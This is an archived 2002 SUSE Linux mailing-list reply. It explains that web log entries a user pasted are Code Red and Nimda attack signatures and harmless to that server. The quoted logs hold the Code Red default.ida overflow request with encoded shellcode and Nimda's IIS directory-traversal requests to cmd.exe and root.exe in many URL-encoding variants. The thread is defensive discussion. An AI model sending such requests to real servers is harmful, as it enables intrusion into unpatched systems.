12 Mar
2002
12 Mar
'02
23:46
This is the Code Red / Nimda attack signatures. You can just ignore them since you are not at risk. I know, they really clutter up the logs though. I do not think there is a way to keep them out of the log, on the security list they went around on this and I do not remember any specific resolution which would keep them out of the log files. (anyone know of a way to avoid logging these entries?) Jim 03/12/02 05:19:04 PM, Landy Romanwrote: > >i saw these entries in my weblog anything i can do against this > > > >61.182.248.223 - - [12/Mar/2002:07:47:44 -0500] "GET >/default.ida? NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090% u6858%ucbd3%u7801%u9090% >u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u >0000%u00=a HTTP/1.0" 400 331 64.133.27.115 - - [12/Mar/2002:10:23:19 >-0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - - >[12/Mar/2002:10:23:20 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 476 >64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - - >[12/Mar/2002:10:23:20 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 >64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET >/_mem_bin/..%255c../..%255c../..% 255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 401 476 64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1% 1c../winnt >/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 64.133.27.115 - - >[12/Mar/2002:10:23:21 -0500] "GET >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 >64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 >64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 >64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 >64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 >64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 >64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 >64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476 >202.5.152.215 - - [12/Mar/2002:12:01:15 -0500] "GET >/default.ida? NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090% u6858%ucbd3%u7801%u9090% >u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u >0000%u00=a HTTP/1.0" 400 331 146.155.10.241 - - [12/Mar/2002:12:50:04 >-0500] "GET >/default.ida? NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090% u6858%ucbd3%u7801%u9090% >u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u >0000%u00=a HTTP/1.0" 400 331 212.205.99.248 - - [12/Mar/2002:13:07:02 >-0500] "GET >/default.ida? NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090% u6858%ucbd3%u7801%u9090% >u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u >0000%u00=a HTTP/1.0" 400 331 > >-- >To unsubscribe send e-mail to suse-linux-e-unsubscribe@suse.com >For additional commands send e-mail to suse-linux-e-help@suse.com >Also check the FAQ at http://www.suse.com/support/faq and the >archives at http://lists.suse.com > >